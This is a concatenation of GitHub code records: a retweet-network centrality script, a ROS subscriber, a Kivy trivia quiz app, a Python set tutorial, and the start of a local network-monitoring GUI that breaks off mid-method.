show_sample(sample)\n","repo_name":"zhangjunh/DR-GAN-by-pytorch","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"53"} +{"seq_id":"36117883457","text":"from itertools import islice\nimport pandas as pd\nimport csv\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n#-----------(xls-csv) conversion-----------#\n\n#------ Load the XLS file into a pandas dataframe-------#\ndf = pd.read_excel('retweets.xlsx')\n\n# Save the dataframe to a CSV file\ndf.to_csv('retweets_columnForm.csv', index=False)\n\n#--------interchange of colums and rows-----------------#\n\n# Load the CSV file into a pandas dataframe\ndf = pd.read_csv('retweets_columnForm.csv')\n\n# Transpose the dataframe (i.e., swap rows and columns)\ndf = df.transpose()\n\n# Save the transposed dataframe to a new CSV file\ndf.to_csv('retweets_rowForm.csv', header=False)\n\n\n#------------counting number of headers-----------#\nheadings=[]\nwith open('retweets_rowForm.csv', 'r') as file:\n\n # Create a reader object\n reader = csv.reader(file)\n\n # Count the number of header rows\n num_headers = 0\n for row in reader:\n if any(row):\n headings.append(row)\n num_headers += 1\n else:\n break\n#-------------------------------#\n# Print the number of headers\n# print(headings)\n\n\n# Print the column data\ncolumn_data=[]\nrow_data=[]\n\n#----storing each row of data--------#\nwith open('retweets_columnForm.csv', 'r') as file:\n reader= csv.reader(file)\n data = list(reader)\n\n 
row_data=data[0]\n\n\n # for name in data:\n # print(name)\n file.close()\n # row_data=[]\n\n\nG = nx.DiGraph()\npos = nx.spring_layout(G) # positions for all nodes\n\n# ---------Add nodes to the graph for each header------\nnode_labels = []\nfor name in row_data:\n if G.has_node(name):\n continue\n else:\n G.add_node(name,name=name)\n # node_labels.append(name)\n\n# nx.draw_networkx_nodes(G, pos, node_labels,node_color=\"red\")\n# Print the nodes in the graph\n\n#--------------------------#\n# print(G.nodes())\n# print(node_labels)\n\n#------iterating over the number of original users---#\nj=0\nfor name in row_data:\n #---getting the name of the user---#\n originalUser_name= name\n\n #getting the retweet data of the particular user#\n with open('retweets_rowForm.csv', 'r') as file:\n reader = csv.reader(file)\n column_datas = list(reader)\n # print(column_datas[j])\n\n #--iterating through each retweet of a specific user---#\n for retweet_name in column_datas[j]:\n # print(retweet_name)\n if retweet_name == originalUser_name:\n continue\n #if the name is null then we come out of the loop\n elif not retweet_name:\n break\n else:\n #-----checking if the graph has the particular node\n if G.has_node(retweet_name):\n #if the graph has the node then we add an edge between them\n G.add_edge(originalUser_name, retweet_name)\n else:\n #if the present graph doesnot has the node then we create the node\n G.add_node(retweet_name, name=retweet_name, color=\"red\")\n #adding edge between the nodes\n G.add_edge(originalUser_name, retweet_name)\n\n j+=1\n\n# label = G.nodes[node]['name']\npos = nx.spring_layout(G)\nnx.draw_networkx_nodes(G, pos)\nnx.draw_networkx_edges(G, pos)\nnx.draw_networkx_labels(G, pos, font_size=5)\nplt.tight_layout()\nplt.show()\n# print(nx.is_connected(G))\n\n\n#-------Getting all the nodes in the graph--#\nnode_list=[]\nfor node in G.nodes():\n node_list.append(node)\n\n\n#--------centrality-----------#\n\ndegree_centrality = nx.degree_centrality(G)\nin_degree=nx.in_degree_centrality(G)\nout_degree = nx.out_degree_centrality(G)\nbetween_centrality=nx.betweenness_centrality(G)\ncloseness_centrality = nx.closeness_centrality(G)\nkatz=nx.katz_centrality(G)\neigen_centrality = nx.eigenvector_centrality_numpy(G)\npage_rank = nx.pagerank(G)\n\n\n#-------calculating average of centralities-------#\naverage={}\nfor key, deg, betw, katzv in zip(degree_centrality, degree_centrality.values(), between_centrality.values(), katz.values()):\n avg = (deg+betw+katzv)/3\n average[key]=avg\n\n\n##-----------calculating spread of the graph----------#\n\n# Calculate the spread of the graph\nspread = {}\nfor node in G.nodes():\n spread[node] = nx.single_source_shortest_path_length(G, node)\n# print(spread)\n\n# Aggregate the results\ntotal_spread = {}\nfor node in G.nodes():\n for target, distance in spread[node].items():\n if target not in total_spread:\n total_spread[target] = distance\n else:\n total_spread[target] += distance\n\n# print(total_spread)\n# Calculate the average spread\nnum_pairs = len(total_spread)\ntotal_distance = sum(total_spread.values())\naverage_spread = total_distance / num_pairs\n# print(average_spread)\n\n\n# Compute ratio of out-degree centrality to average shortest path length\naverage_spread_outdeg={}\nfor node in G.nodes():\n if out_degree[node] == 0:\n average_spread_outdeg[node]=0\n else:\n average_spread_outdeg[node] = total_spread[node] / out_degree[node]\n\n#\n# ##-------sorting centralities to find influential people-------#\n#\n# # Sort the degree centrality 
data temporarily in descending order\n# sorted_deg_cent = sorted(degree_centrality.items(), key=lambda x: x[1], reverse=True)\n# sorted_btw_cent = sorted(between_centrality.items(), key=lambda x: x[1], reverse=True)\n# sorted_cls_cent = sorted(closeness_centrality.items(), key=lambda x: x[1], reverse=True)\n# sorted_eig_cent = sorted(eigen_centrality.items(), key=lambda x: x[1], reverse=True)\n\n\n#----creating a file to store the centrality data----#\ndata = [(k, degree_centrality[k], in_degree[k],out_degree[k],between_centrality[k], katz[k], eigen_centrality[k], average[k], total_spread[k]) for k in degree_centrality]\nwith open('data.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(['Nodes','Degree_centrality', 'In_Degree', 'Out_Degree','Betweenness','KaztCentrality','Eigen_Centrality', 'Average_Centrality', 'Spread'])\n writer.writerows(data)\n\n# plt.show()\n\n##-------sorting centralities to find influential people-------#\n\n# Sort the degree centrality data temporarily in descending order\nsorted_deg_cent = sorted(degree_centrality.items(), key=lambda x: x[1], reverse=True)\nsorted_btw_cent = sorted(between_centrality.items(), key=lambda x: x[1], reverse=True)\nsorted_cls_cent = sorted(closeness_centrality.items(), key=lambda x: x[1], reverse=True)\nsorted_eig_cent = sorted(eigen_centrality.items(), key=lambda x: x[1], reverse=True)\nsorted_page_rank = sorted(page_rank.items(), key=lambda x: x[1], reverse=True)\nsorted_avg_cent = sorted(average.items(), key=lambda x: x[1], reverse=True)\nsorted_spread = sorted(average_spread_outdeg.items(), key=lambda x: x[1], reverse=True)\nsorted_katz = sorted(katz.items(), key=lambda x: x[1], reverse=True)\nsorted_out_degree = sorted(out_degree.items(), key=lambda x: x[1], reverse=True)\n\n\n#------top 5 influencers in various category-----#\n\ndeg_influencers={}\nout_deg_influencers={}\nbetw_influencers={}\nclose_influencers={}\nkatz_influencers={}\npage_rank_influencers={}\naverage_influencers={}\naverage_spread_influencers={}\n\ndeg_influencers.update(dict(islice(sorted_deg_cent, 5)))\nout_deg_influencers.update(dict(islice(sorted_out_degree, 5)))\nbetw_influencers.update(dict(islice(sorted_btw_cent, 5)))\nclose_influencers.update(dict(islice(sorted_cls_cent, 5)))\nkatz_influencers.update(dict(islice(sorted_katz, 5)))\npage_rank_influencers.update(dict(islice(sorted_page_rank, 5)))\naverage_influencers.update(dict(islice(sorted_avg_cent, 5)))\naverage_spread_influencers.update(dict(islice(sorted_spread, 5)))\n\n\n# print(deg_influencers)\n# print(betw_inflencers)\n# print(close_inflencers)\n# print(eigen_inflencers)\n\n\n##--------creating figures----------#\n\nfont = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 3,\n }\n\n# plot the network graph\nplt.subplot(3, 3, 1)\n# pos = nx.spring_layout(G)\nnx.draw_networkx_nodes(G, pos)\nnx.draw_networkx_edges(G, pos)\nnx.draw_networkx_labels(G, pos, font_size=0.2)\n\n# plot the first bar graph\nplt.subplot(3, 3, 2)\nplt.bar(deg_influencers.keys(), deg_influencers.values())\nplt.title('Degree Centrality')\n# plt.xlabel(\"People\")\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n# plt.xticks(list(range(len(deg_influencers.values()))), [label.replace(' ', '\\n') for label in deg_influencers.values()])\n\n\n# plot the second bar graph\nplt.subplot(3, 3, 3)\nplt.bar(betw_influencers.keys(), betw_influencers.values())\nplt.title('Betweenness Centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the third bar 
graph\nplt.subplot(3, 3, 4)\nplt.bar(close_influencers.keys(), close_influencers.values())\nplt.title('Closeness Centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the fourth bar graph\nplt.subplot(3, 3, 5)\nplt.bar(page_rank_influencers.keys(), page_rank_influencers.values())\nplt.title('PageRank Centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the fifth bar graph\nplt.subplot(3, 3, 6)\nplt.bar(average_influencers.keys(), average_influencers.values())\nplt.title('All rounder on avg centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the sixth bar graph\nplt.subplot(3, 3, 7)\nplt.bar(katz_influencers.keys(), katz_influencers.values())\nplt.title('Katz Centrality')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the seventh bar graph\nplt.subplot(3, 3, 8)\nplt.bar(out_deg_influencers.keys(), out_deg_influencers.values())\nplt.title('Out degree')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# plot the eighth bar graph\nplt.subplot(3, 3, 9)\nplt.bar(average_spread_influencers.keys(), average_spread_influencers.values())\nplt.title('Average spread')\nplt.xticks(fontsize=6)\nplt.xticks(rotation=45)\n\n# adjust the layout and display the plot\nplt.tight_layout()\n\n\n# Display the figure\nplt.show()","repo_name":"Ishita-Jana/Influence-Graph-Twitter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23334287958","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom std_msgs.msg import String\n\n\ndef Subscriber():\n\tsub = rospy.Subscriber('/simple_publisher',String,print_result)\n\trospy.spin()\n\t\ndef print_result(data):\n\trospy.loginfo(data)\n\nif __name__ == '__main__':\n\trospy.init_node('simple_subscriber_node')\n\tSubscriber()\n","repo_name":"hashrobotics-hr/ros_for_beginners","sub_path":"simple_catkin_ws/src/simple_pub_sub/src/simple_subscriber.py","file_name":"simple_subscriber.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30664702010","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom kivy.core.window import Window\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.graphics import Color\nfrom time import sleep\nfrom kivy.logger import Logger\nfrom kivy.clock import Clock, mainthread\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.image import Image\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.progressbar import ProgressBar\nfrom kivy.animation import Animation\nfrom kivy.uix.screenmanager import ScreenManager, Screen, NoTransition\nfrom kivy.properties import NumericProperty, ListProperty, StringProperty, BooleanProperty, ObjectProperty, DictProperty\n\n\nfrom random import shuffle, choice, randint\nfrom functools import partial\n\nfrom helpers import get_categories, get_verdict\nfrom trivia import Trivia\nfrom soundmachine import SoundMachine\nfrom screens import TitleScreen, Intro, Options, Instructions, Credits, Game, Score\nfrom simple_widgets import AlphaWidget, RoundedBox, PlayOrOptions, PressOK, PressColor\nfrom scrollmenu import ScrollMenu, FreeScrollView, ScrollAwareLayout, OptionButton, 
OptionIndicator\nfrom constants import CEC_CMD_MAP, INSTRUCTION_TEXT\n\nimport json\nimport sys\n\n\n# Pass cli arguments\n\nDISABLE_CEC = True if '--disable-cec' in sys.argv else False\nUSE_SAMPLE_DATA = True if '--use-sample-data' in sys.argv else False\nSET_SIZE = True if '--set-size' in sys.argv else False\n\n# Backend settings\n\nBACKENDS = {\n \"opentdb\": {\n \"url\": \"https://opentdb.com/api.php\",\n \"categories\": get_categories()\n\n },\n \"feduquizdb\": {\n \"url\": \"https://dillendapp.eu/feduquizdb/api/trivia\",\n \"categories\": [[\"All\", -1], [\"General knowledge\", 1],[\"Luxemburgensia\", 2]]\n }\n}\n\n\nclass GameButtons(Widget):\n\n game_root = ObjectProperty()\n\n def anim_all(self, direction, highlight=None, callback=None):\n\n # Check if we're animating in or out\n if direction == \"in\":\n anim_func = self.anim_in\n else:\n anim_func = self.anim_out\n\n # Set start timer to 0\n time_start = 0\n\n # Check what buttons need to be animated which way (to highlight answer)\n # Only really intended to be used for the fade OUT animation!\n col_list = ['red', 'green', 'yellow', 'blue'] if len(App.get_running_app().curr_btn_labels) > 2 else ['red', 'green']\n col_needed = [col for col in col_list if col is not highlight] if highlight else col_list\n \n # Check if a button is to be highlighted (ie\n if highlight:\n Animation(opacity=0, scale=1.5, duration=0.6).start(self.ids['btn_' + highlight])\n\n for index, color in enumerate(col_needed):\n\n # \"Normal\" animation\n if callback is None or index < (len(col_needed)-1):\n Clock.schedule_once(partial(anim_func, btn=self.ids['btn_' + color], callback=None), time_start)\n else:\n # We want to attach any potential callback to the last button animation\n Clock.schedule_once(partial(anim_func, btn=self.ids['btn_' + color], callback=callback), time_start)\n time_start += 0.1\n\n if direction == \"in\":\n for color in col_list:\n self.ids['btn_' + color].stop_effect_anims()\n Clock.schedule_once(self.ids['btn_' + color].effect_anim, 0.7)\n\n\n def test_func(self, *args, **kwargs):\n print('The flexible function has *args of', str(args),\n \"and **kwargs of\", str(kwargs))\n\n def anim_in(self, dt, btn, callback=None):\n anim = Animation(pos_hint={'center_x': btn.primary_position[0], 'center_y': btn.primary_position[1]}, scale=1,\n t='out_elastic', duration=1)\n if callback:\n anim.bind(on_complete=lambda anim, widget: callback())\n anim.start(btn)\n\n def anim_out(self, dt, btn, callback=None):\n anim = Animation(pos_hint={'center_x': btn.secondary_position_2[0], 'center_y': btn.secondary_position_2[1]}, scale=btn.secondary_scale_2,\n t='in_circ', duration=0.5)\n if callback:\n anim.bind(on_complete=lambda anim, widget: callback())\n anim.start(btn)\n\n def reset_pos(self):\n for color in ['red', 'green', 'yellow', 'blue']:\n btn = self.ids['btn_'+color]\n btn.opacity = 1\n btn.pos_hint = {'center_x': btn.secondary_position_1[0], 'center_y': btn.secondary_position_1[1]}\n btn.scale = btn.secondary_scale_2\n\nclass TriviaButton(Button):\n\n scale = NumericProperty()\n x_transform = NumericProperty()\n x_transform_end = NumericProperty()\n base_color = StringProperty('')\n curr_normal = ListProperty('')\n curr_down = ListProperty('')\n secondary_position_1 = ListProperty([])\n secondary_position_2 = ListProperty([])\n secondary_scale_1 = NumericProperty()\n secondary_scale_2 = NumericProperty()\n primary_position = ListProperty([])\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.anim = None\n self.anim_scheduler 
= None\n\n def stop_effect_anims(self):\n \"\"\"\n Stops the special effect animation of the button. This involves cancelling any\n ongoing animation and / or unscheduling scheduled animations that have been set\n by the reschedule method.\n \"\"\"\n Animation.cancel_all(self)\n if self.anim_scheduler:\n self.anim_scheduler.cancel()\n self.reset_pos()\n\n def effect_anim(self, anim=None, widget=None):\n \"\"\"\n Starts the special effect animation of the TriviaButton.\n Note that if the size changes during gameplay, for instance because the player\n alters the window size, the animation will be slightly off. Yet, this is not so important\n as the animation is stopped and restarted after every question (and hence the animation\n gets restarted using the correct self.width). So, the use of an on_width trigger is not\n really necessary.\n \"\"\"\n self.anim = Animation(x_transform=self.width+20, duration=1)\n self.anim.bind(on_complete=self.reschedule)\n self.anim.start(self)\n\n def reschedule(self, anim=None, widget=None):\n \"\"\"\n After the special animation has run once, this callback is called to reschedule\n it at a random time, so that there is a slight offset for the effect among the \n TriviaButtons.\n A reference for the clock object is kept so that Animation can be cancelled, as\n Animation.cancel_all will only catch current animations, but not the scheduled ones.\n \"\"\"\n self.reset_pos()\n self.anim_scheduler = Clock.schedule_once(self.reanim, randint(20, 40)/10)\n\n def reanim(self, dt=None):\n \"\"\"Convenience function to swallow the dt argumemt of Clock callbacks.\"\"\"\n self.anim.start(self)\n\n def reset_pos(self):\n \"\"\"Resets the special effect animation to its initial settings.\"\"\"\n self.x_transform = -20\n\n\nclass AnswerFeedbackLabel(Label):\n\n angle = NumericProperty()\n scale = NumericProperty()\n primary_angle = NumericProperty()\n primary_scale = NumericProperty()\n secondary_angle = NumericProperty()\n secondary_scale = NumericProperty()\n sentiment = StringProperty()\n\n def animate(self):\n anim_opacity = Animation(opacity=1, duration=0.5) + Animation(opacity=0, duration=0.5)\n anim_scale = Animation(scale=self.secondary_scale, angle=self.secondary_angle, duration=1)\n anim_full = anim_opacity & anim_scale\n anim_full.bind(on_complete=self.reset_pos)\n anim_full.start(self)\n\n def reset_pos(self, anim=None, widget=None):\n self.scale = self.primary_scale\n self.angle = self.primary_angle\n\nclass QuestionLabel(Label):\n\n secondary_position_1 = ListProperty()\n secondary_position_2 = ListProperty()\n primary_position = ListProperty()\n parent_width = NumericProperty()\n mask_width = NumericProperty(0)\n bg_pos = ListProperty([0,0])\n bg_size = ListProperty([0,0])\n\n def anim_mask_open(self):\n \"\"\"Widens the stencil mask so that the text becomes visible.\"\"\"\n anim = Animation(mask_width=self.bg_size[0], t='out_quad', duration=1)\n anim.start(self)\n\n def reset_pos(self, anim=None, widget=None):\n self.mask_width = 0\n\nclass Round(BoxLayout):\n pass\n\n\nclass Difficulty(BoxLayout):\n \n indicator_layout_pos = ListProperty()\n indicator_layout = ObjectProperty(rebind=True)\n\nclass Difficulty_Indicator(Widget):\n\n scale = NumericProperty()\n indicator_size = ListProperty()\n indicator_color = ListProperty()\n widget_difficulty = StringProperty()\n current_difficulty = StringProperty()\n visible = BooleanProperty()\n fore_opacity = NumericProperty()\n\nclass GameInfo(BoxLayout):\n\n secondary_position = ListProperty()\n primary_position = 
ListProperty()\n \nclass ScrollLabel(ScrollView):\n\n label_text = StringProperty()\n font_size = NumericProperty()\n font_name = StringProperty()\n \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.next_label_text = None\n self.scroll_anim = None\n self.scroll_anim_scheduler = None\n\n def on_label_text(self, widget, label_text):\n \"\"\"\n The label to be displayed has changed, this means we want to animate out the currently\n scrolling label and fade back in the label with the new text.\n We first save the new label text in a variable and start the fade out animation.\n \"\"\"\n #self.next_label_text = label_text\n self.fade_out_animation()\n\n def fade_out_animation(self):\n \"\"\"\n Starts the fade out animation, but only if opacity is not already 0 (might happen if\n this is the first time the label receives a text for example).\n \"\"\"\n if self.opacity == 0:\n self.fade_in_animation()\n else:\n anim_out = Animation(opacity=0, duration=0.2)\n anim_out.bind(on_complete=self.fade_in_prep)\n anim_out.start(self)\n\n def fade_in_prep(self, anim=None, widget=None):\n \"\"\"\n This function gets called at the end of the fade out animation and prepares the\n fade in animation, for example by actually setting the label's text to the desired value\n and resetting positions etc.\n At the end, we schedule the fade in for the next frame. We do it this way so the label's\n properties are updated correctly (as we need its width).\n \"\"\"\n self.ids.scrollable_label.text = self.label_text\n Animation.cancel_all(self)\n self.reset_pos()\n Clock.schedule_once(self.fade_in_animation)\n\n def fade_in_animation(self, dt=None):\n \"\"\"\n Starts the fade in animation.\n \"\"\"\n self.scroll_anim = Animation(scroll_x=1, duration=(self.ids.scrollable_label.width / 300))\n self.scroll_anim.bind(on_complete=self.scroll_reschedule)\n self.scroll_anim.start(self)\n Animation(opacity=1, duration=0.2).start(self)\n \n def scroll_reschedule(self, anim=None, widget=None):\n \"\"\"\n Gets called at the end of each scroll animation and basically resets and reschedules it for the next frame.\n \"\"\"\n self.reset_pos()\n self.scroll_anim_scheduler = Clock.schedule_once(self.scroll_reanim)\n\n def scroll_reanim(self, dt=None):\n \"\"\"\n Convenience function to restart the scroll animation.\n \"\"\"\n self.scroll_anim.start(self)\n\n def reset_pos(self, *args):\n \"\"\"\n Resets some values to initial state.\n \"\"\"\n self.scroll_x = 0\n\n\nclass Category(BoxLayout):\n\n cat = ObjectProperty(rebind=True)\n scroll_size = ListProperty()\n spacer_width = NumericProperty()\n\nclass Author(BoxLayout):\n \n author_lbl = ObjectProperty(rebind=True)\n\nclass Feduquiz(App):\n title = 'Feduquiz'\n\n bg_col = ListProperty([0, 0, 0])\n\n trivia = Trivia(USE_SAMPLE_DATA)\n\n curr_question = StringProperty()\n curr_author = StringProperty()\n curr_type = StringProperty()\n curr_difficulty = StringProperty()\n curr_category = StringProperty()\n curr_correct = StringProperty()\n curr_wrong = ListProperty([])\n curr_btn_labels = ListProperty([])\n curr_score = NumericProperty(0)\n curr_round = NumericProperty(0)\n curr_total_rounds = NumericProperty(0)\n curr_verdict = StringProperty()\n\n opt_api = StringProperty('opentdb')\n opt_difficulty = StringProperty('')\n opt_category = NumericProperty(0)\n opt_amount = NumericProperty(10)\n opt_instant_fb = BooleanProperty(True)\n opt_type = StringProperty('')\n\n categories = ListProperty([['All', 0]])\n backends = ListProperty([[\"Open Trivia DB\", 
\"opentdb\"],[\"Feduquiz DB\", \"feduquizdb\"]])\n \n instruction_text = StringProperty(INSTRUCTION_TEXT)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.categories = get_categories()\n self.bind(opt_api=self.update_categories)\n self.fps_event = Clock.schedule_interval(self.print_fps, 1/2.0)\n self.sm = None\n self.bg_anim = (Animation(bg_col=[1,0,0], duration=2) +\n Animation(bg_col=[1,1,0], duration=2) +\n Animation(bg_col=[0, 1, 1], duration=2) +\n Animation(bg_col=[0, 0, 1], duration=2) +\n Animation(bg_col=[1, 0, 1], duration=2))\n self.bg_anim.repeat = True\n\n self.snd_machine = SoundMachine()\n #self.bg_anim.start(self) # Will be started by first screen (Intro)\n\n self.callbacks = []\n\n # Register EXIT and SCREENSHOT handler\n self.add_callback(CEC_CMD_MAP[\"EXIT\"], \"ALL\", lambda: App.get_running_app().stop())\n\n # Set window size if instructed\n if SET_SIZE:\n Window.size = (1920, 1080)\n Window.left = 0\n Window.top = 1\n\n # Get keyboard\n #self._keyboard = Window.request_keyboard(self._keyboard_closed, self)\n Window.bind(on_key_down=self._on_keyboard_down)\n\n # initialise libCEC\n if not DISABLE_CEC:\n from cec_control import pyCecClient\n self.lib = pyCecClient()\n self.lib.SetCommandCallback(lambda cmd: self.command_callback(cmd, 'cec'))\n\n # initialise libCEC and enter the main loop\n self.lib.InitLibCec()\n\n def build(self):\n self.sm = ScreenManager(transition=NoTransition())\n self.sm.add_widget(Intro(name='intro'))\n self.sm.add_widget(Game(name='game'))\n self.sm.add_widget(Score(name='score'))\n self.sm.add_widget(Options(name='options'))\n self.sm.add_widget(Instructions(name='instructions'))\n self.sm.add_widget(Credits(name='credits'))\n return self.sm\n\n def update_categories(self, property, api):\n self.categories = BACKENDS[api][\"categories\"]\n\n def load_game(self, anim=None, widget=None):\n self.trivia.new_game(BACKENDS[self.opt_api][\"url\"], self.opt_difficulty, self.opt_category, self.opt_amount, self.opt_type)\n Clock.schedule_once(self.check_switch_screen)\n\n def check_switch_screen(self, dt=None):\n if not self.trivia.running:\n Clock.schedule_once(self.check_switch_screen)\n return\n self.sm.current = 'game'\n self.snd_machine.mode_game()\n\n def goto_screen(self, dt=None, s_name=None):\n if s_name:\n self.sm.current = s_name\n self.snd_machine.mode_menu()\n\n @mainthread\n def command_callback(self, cmd, origin):\n \"\"\"Callback function for the CEC module\"\"\"\n print(\"{} command received: {}\".format(origin, cmd))\n current = self.sm.current\n match = False\n for callback in self.callbacks:\n if cmd in callback[0] and (callback[1] == \"ALL\" or current == callback[1]):\n callback[2]()\n match = True\n print(\"Callback executed\")\n return match\n\n\n def add_callback(self, cmd, screen, callback):\n \"\"\"Adds a callback within the app.\"\"\"\n print(\"Adding callback \" + str(callback) + \" for screen \" + screen + \" for command \" + str(cmd))\n self.callbacks.append([cmd, screen, callback])\n\n\n def _on_keyboard_down(self, window, keycode, scancode, text, modifiers, **kwargs):\n print('The key {} {} {} has been pressed'.format(keycode, 'with text '+text if text else '', 'and modifiers '+str(modifiers) if len(modifiers)>0 else ''))\n\n # Call callback\n return self.command_callback(keycode, 'keyboard')\n\n # Return True to accept the key. 
Otherwise, it will be used by\n        # the system.\n        #return True\n    \n    def print_fps(self, *args):\n        fps = Clock.get_fps()\n        print(\"{} Fps \".format(int(fps)), end='\\r')\n\nif __name__ == '__main__':\n    Feduquiz().run()","repo_name":"fedus/feduquiz","sub_path":"feduquiz.py","file_name":"feduquiz.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29337757292","text":"# set: a deduplicated, unordered collection!\r\nmy_set = {'黑马', '白马', '红马', '绿马', '白马', '红马', '绿马', '白马', '红马', '绿马'}\r\nprint(\"my_set's type is: {}, contents: {}\".format(type(my_set), my_set))\r\n\r\n# set.add()\r\nmy_set.add(\"皮马\")\r\nmy_set.add(\"绿马\")\r\nprint(my_set)\r\n\r\n# set.remove(element)\r\n\r\n# set.pop() removes and returns an arbitrary element from the set\r\n\r\n# set.clear()\r\n\r\n# set3 = set1.difference(set2) builds a new set3 from the elements that are in set1 but not in set2; neither set1 nor set2 is affected\r\n\r\n# set1.difference_update(set2) removes from set1 the elements that also exist in set2; set1 is modified in place\r\n\r\n# set3 = set1.union(set2) merges set1 and set2 into a new set3\r\n\r\n# len(set)\r\n\r\n# Sets can only be traversed with a for loop, because they are unordered and do not support index access\r\n\r\nmy_list = ['黑马程序', '黑马', '黑马程', '无序', '黑马', '黑马程', '无序']\r\nmy_set = set()\r\n\r\nfor element in my_list:\r\n    print('Set before the update: {}'.format(my_set))\r\n    my_set.add(element)\r\n    print('Set after the update: {}'.format(my_set))","repo_name":"ShenTengyu/python_learning","sub_path":"practice_py/practice/practice_basic_syntax/practice08_set.py","file_name":"practice08_set.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43428900002","text":"from modulos import *\r\n\r\n# Core Python utility libraries\r\nimport os\r\nimport sys\r\nfrom time import sleep\r\nimport subprocess as sb\r\nfrom threading import Thread\r\nfrom openpyxl import Workbook\r\nfrom datetime import datetime as dt\r\nfrom webbrowser import open as WebOpen\r\nfrom scapy.all import sniff\r\nfrom getpass import getuser\r\n# GUI libraries\r\nfrom PySide6.QtGui import QPixmap,QPainter,QIcon,QColor\r\nfrom PySide6.QtWidgets import QApplication, QMainWindow, QHBoxLayout, QLabel,QWidget,QVBoxLayout, QGridLayout,QFrame,QPushButton, QTableWidgetItem\r\nfrom PySide6.QtCharts import QBarSeries,QBarSet,QBarCategoryAxis,QChart,QLineSeries,QChartView,QPieSeries\r\nfrom PySide6.QtCore import Qt,QEasingCurve,QPropertyAnimation,Signal,QFile,QTextStream\r\nfrom modulos.UI_Interfaz import Ui_MainWindow\r\nimport socket\r\nos.environ[\"QT_FONT_DPI\"] = \"96\"\r\n\r\nclass Informacion_Red():\r\n    INTERFAZ=\"\"\r\n    GATEWAY=\"\"\r\n    auxGate=\"\"\r\n    IPV4=\"\"\r\n    CAMBIOS=False\r\n    SALIR=False\r\n    SSID=\"\"\r\n    MASCARA=\"\"\r\n    Errores=[]\r\n    VENTANA=\"\"\r\n    TEMA=\"\"\r\n    DETECCION=\"\"\r\n    TIEMPO_DETECCION=0\r\n    TIEMPO_PAQ=0\r\n    CONEXION=True\r\n    def __init__(self) -> None:\r\n        self.Iniciarconfiguracion()\r\n        dis=rs.Obtener_Dispositivos(True)\r\n        auxIns=[]\r\n        for INTER in dis:\r\n            if \"WI-FI\" in INTER[0].upper() or \"WIFI\" in INTER[0].upper() or \"ETHER\" in INTER[0].upper():\r\n                auxIns.append(INTER[0])\r\n            if INTER[3] != \"--\" and INTER[3] != \"127.0.0.1\" and INTER[5]!=\"--\" and \"VIRTUAL\" not in INTER[0].upper():\r\n                self.INTERFAZ=INTER[0]\r\n                self.MASCARA=INTER[4]\r\n                self.GATEWAY=INTER[5]\r\n                self.IPV4=INTER[3]\r\n        self.SSID=rs.obtener_SSID(self.INTERFAZ)\r\n        if self.SSID=='NO TIENE':\r\n            try:\r\n                self.SSID=str(socket.getfqdn(self.GATEWAY))\r\n                if self.SSID==self.GATEWAY:\r\n                    try:\r\n                        self.SSID=str(rs.get_mac_details(rs.escanearARP_U(self.GATEWAY,self.INTERFAZ,2,False)[1]))\r\n                    except:\r\n                        
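# The MAC-vendor lookup failed too, so fall back to the raw gateway IP as the name.\r\n                        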
self.SSID=self.GATEWAY\r\n except:\r\n try:\r\n self.SSID=str(rs.get_mac_details(rs.escanearARP_U(self.GATEWAY,self.INTERFAZ,2,False)[1]))\r\n except:\r\n self.SSID=self.GATEWAY\r\n self.auxGate=self.GATEWAY\r\n aux=db.consultarRED()\r\n encontrado=False\r\n for i in aux:\r\n if i[1]==self.SSID:\r\n encontrado=True\r\n if encontrado==False and self.SSID!='POR DEFECTO' and self.SSID != \"SIN CONEXION\" and self.SSID != \"--\" and self.SSID != \"\":\r\n db.insertarRED(self.SSID,\"Pendiente\",0,0,1)\r\n if self.SSID==\"SIN CONEXION\":\r\n print(\"[!] No hay conexión con ninguna red.\")\r\n self.IPV4=\"--\"\r\n self.GATEWAY=\"--\"\r\n self.CONEXION=False\r\n self.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Sin red.\",\"No hay conexión con ninguna red.\"]) \r\n e=False\r\n if len(auxIns)>0:\r\n for a in auxIns:\r\n if \"VIRTUAL\" not in a.upper():\r\n self.INTERFAZ=a\r\n e=True\r\n break\r\n if e==False:\r\n print(\"[!] No hay interfaces de red.\")\r\n self.INTERFAZ=\"Wi-Fi\" \r\n def setIPV4(self,ipv4):\r\n self.IPV4=ipv4 \r\n def getIPV4(self):\r\n return self.IPV4\r\n def 